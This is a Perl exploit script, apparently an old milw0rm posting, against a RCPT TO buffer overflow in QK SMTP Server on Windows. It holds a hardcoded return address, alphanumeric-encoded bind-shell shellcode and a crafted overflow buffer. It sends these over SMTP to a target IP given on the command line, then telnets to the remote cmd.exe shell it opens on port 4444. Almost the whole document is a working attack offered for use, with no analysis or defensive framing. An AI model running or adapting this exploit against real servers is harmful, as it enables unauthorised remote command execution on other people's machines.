#!/bin/perl##https://www.securityfocus.com/bid/20681## tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit# credit to Greg Linares for discovered the vulnerability# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool# Jacopo Cervini aka acaro [at] jervus.itif(@ARGV <1){print"--------------------------------------------------------------------\n";print"Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress \n";print" Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 \n";print"--------------------------------------------------------------------\n";}
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port =25;
my $reply;
my $request;#my $eip="\x43\x43\x43\x43";
my $eip="\x8f\x29\x46\x00";#call esp in QKSmtpServer3.exe
$sc="PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ"."BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP"."44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM"."pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo"."6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r"."7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm"."PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk"."OvpOxhp1zitOonsKOyFKO6pA";
$jmpback ="\x50\x73"."\x54\x73"."\x58\x73"."\xb0"."\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\xb0\x48\x73"."\x40\x73"."\x40\x73"."\x40\x73"."\x40\x73"."\x40\x73"."\x40\x73"."\x40\x73"."\x50\x73"."\xc3\x73";
my $buffer=("\x41"x296).$eip.("\x73"x2228).$sc.("\x45"x820).$jmpback."\x00";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply,1024,0);print"Response:". $reply;
$request ="helo acaro"."\r\n";
send $socket, $request,0;print"[+] Sent helo request\n";
recv($socket, $reply,1024,0);print"Response:". $reply;
sleep(1);
$request ="mail from: acaro@peaceandlove.peace"."\r\n";
send $socket, $request,0;print"[+] Sent mail from request\n";
recv($socket, $reply,1024,0);print"Response:". $reply;
sleep(1);
$request ="rcpt to: ". $buffer."\r\n";
send $socket, $request,0;print"[+] Sent rcpt to request\n";print" + connect on 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;# milw0rm.com [2007-01-01]